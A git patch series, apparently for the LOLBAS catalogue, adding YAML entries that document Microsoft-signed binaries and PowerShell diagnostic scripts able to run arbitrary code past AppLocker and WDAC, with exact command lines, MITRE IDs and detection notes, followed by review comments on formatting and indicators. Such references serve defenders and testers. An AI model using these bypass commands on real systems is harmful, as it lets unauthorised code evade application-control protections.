From: root Date: Sun, 26 Sep 2021 23:31:30 -0400 Subject: [PATCH 18/19] Adding app-ctrl bypass bins and a few lolscripts --- yml/OSBinaries/Aspnet_Compiler.yml | 28 ++++++++++++++ yml/OSBinaries/Msbuild.yml | 12 ++++++ yml/OSScripts/CL_LoadAssembly.yml | 30 +++++++++++++++ yml/OSScripts/UtilityFunctions.yml | 26 +++++++++++++ yml/OtherMSBinaries/Fsi.yml | 38 +++++++++++++++++++ yml/OtherMSBinaries/FsiAnyCpu.yml | 36 ++++++++++++++++++ yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 31 +++++++++++++++ yml/OtherMSBinaries/Wfc.yml | 28 ++++++++++++++ 8 files changed, 229 insertions(+) create mode 100644 yml/OSBinaries/Aspnet_Compiler.yml create mode 100644 yml/OSScripts/CL_LoadAssembly.yml create mode 100644 yml/OSScripts/UtilityFunctions.yml create mode 100644 yml/OtherMSBinaries/Fsi.yml create mode 100644 yml/OtherMSBinaries/FsiAnyCpu.yml create mode 100644 yml/OtherMSBinaries/VisualUiaVerifyNative.yml create mode 100644 yml/OtherMSBinaries/Wfc.yml diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml new file mode 100644 index 0000000..7cbd821 --- /dev/null +++ b/yml/OSBinaries/Aspnet_Compiler.yml 
@@ -0,0 +1,28 @@ +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index b5bfbe5..5b4deca 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
@@ -20,6 +20,14 @@ Commands: MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.proj + Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + Usecase: Execute project file that contains XslTransformation tag parameters + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -27,6 +35,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe + - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe Code_Sample: - Code: Detection: @@ -36,9 +45,12 @@ Resources: - Link: https://github.com/Cn33liz/MSBuildShell - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' + - Person: Jimmy + Handle: '@bohops' --- \ No newline at end of file diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml new file mode 100644 index 0000000..4bc7719 --- /dev/null +++ b/yml/OSScripts/CL_LoadAssembly.yml 
@@ -0,0 +1,30 @@ +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- + + + +powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml new file mode 100644 index 0000000..8f92417 --- /dev/null +++ b/yml/OSScripts/UtilityFunctions.yml 
@@ -0,0 +1,26 @@ +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml new file mode 100644 index 0000000..66f55f7 --- /dev/null +++ b/yml/OtherMSBinaries/Fsi.yml 
@@ -0,0 +1,38 @@ +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml new file mode 100644 index 0000000..855f7d7 --- /dev/null +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml 
@@ -0,0 +1,36 @@ +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml new file mode 100644 index 0000000..dafea55 --- /dev/null +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
@@ -0,0 +1,31 @@ +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml new file mode 100644 index 0000000..8542015 --- /dev/null +++ b/yml/OtherMSBinaries/Wfc.yml 
@@ -0,0 +1,28 @@ +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file From 741d0f7b360028191a04a3eac4ea4215cf53f635 Mon Sep 17 00:00:00 2001 From: bohops Date: Sun, 26 Sep 2021 23:35:01 -0400 Subject: [PATCH 19/19] Update CL_LoadAssembly.yml --- yml/OSScripts/CL_LoadAssembly.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4bc7719..81e37cd 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -24,7 +24,3 @@ Acknowledgement: - Person: Jimmy Handle: '@bohops' --- - - - -powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file
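Review bot: in Aspnet_Compiler.yml the Command line embeds a user-specific path (`C:\users\cpl.internal\desktop\asptest\`) that should be a placeholder such as `[path to project]`, matching the `[sdk version]` convention used elsewhere in this patch, and `Full_Path` uses `c:\` where the Command uses `C:\`. `IOC: Sysmon Event ID 1 - Process Creation`, repeated verbatim in Fsi.yml, FsiAnyCpu.yml, VisualUiaVerifyNative.yml and Wfc.yml, names an event source rather than an indicator; say what in that event is suspicious, for example aspnet_compiler.exe started with `-p`/`-f` targets under a user profile rather than a web application directory.

Review bot: the added Msbuild.yml entry says `Requires Visual Studio MSBuild v14.0+` but copies the `OperatingSystem` line of the older entries (`Windows vista ... Windows 10`); the constraint is on the MSBuild version, so state it in that field or tie it to the new `C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe` path. `Usecase: Execute project file that contains XslTransformation tag parameters` should describe the effect a defender cares about (script execution through the XslTransformation task) rather than restate the mechanism. This hunk and every new file in the patch end with `\ No newline at end of file`, which earlier commits in this series (Findstr.yml, Cdb.yml) specifically fixed; add the trailing newline.

Review bot: the CL_LoadAssembly.yml Command value opens with a typographic quote (`'”powershell.exe -command "...`) and the closing `"` of the `-command` string is missing, so the quoted command does not round-trip when copied; replace the `”` and close the string, and apply the same fix to UtilityFunctions.yml, whose value ends with `”'`. The four stray lines after the closing `---` (a second variant using `RegSnapin` and `[Program.Class]::Fun()`) leave a dangling second YAML document; the last commit in the series removes them, so squash that commit into this one. `Detection: - IOC:` is empty in both diagnostic-script entries: powershell.exe with `set-location` into the diagnostics directory, `import-module` of the script, and a DLL path that climbs out of that tree (`..\..\..\..\`) is all visible on the command line and would be a concrete indicator.

Review bot: in VisualUiaVerifyNative.yml the Description path `C:\Users\[current user]\AppData\Roaminguiverify.config` is missing the separator between `Roaming` and the config file name; restore it. The Description also leaves the reader to infer that the binary reads and deserializes that file on start-up, which is the defender-relevant fact; stating it directly suggests the obvious indicator, namely a write to `uiverify.config` under `AppData\Roaming` shortly before VisualUiaVerifyNative.exe starts (Sysmon Event ID 11 alongside the Event ID 1 already listed), which would be more useful than the generic `IOC` given.

Review bot: Fsi.yml and FsiAnyCpu.yml list only the Visual Studio 2019 `Professional` path under Full_Path; the interpreter ships with the other editions too, so either add those paths or use an `[edition]` placeholder in the same style as the `[sdk version]` placeholder already used in Fsi.yml. FsiAnyCpu.yml also uses `c:\` where Fsi.yml uses `C:\` for the same directory; pick one.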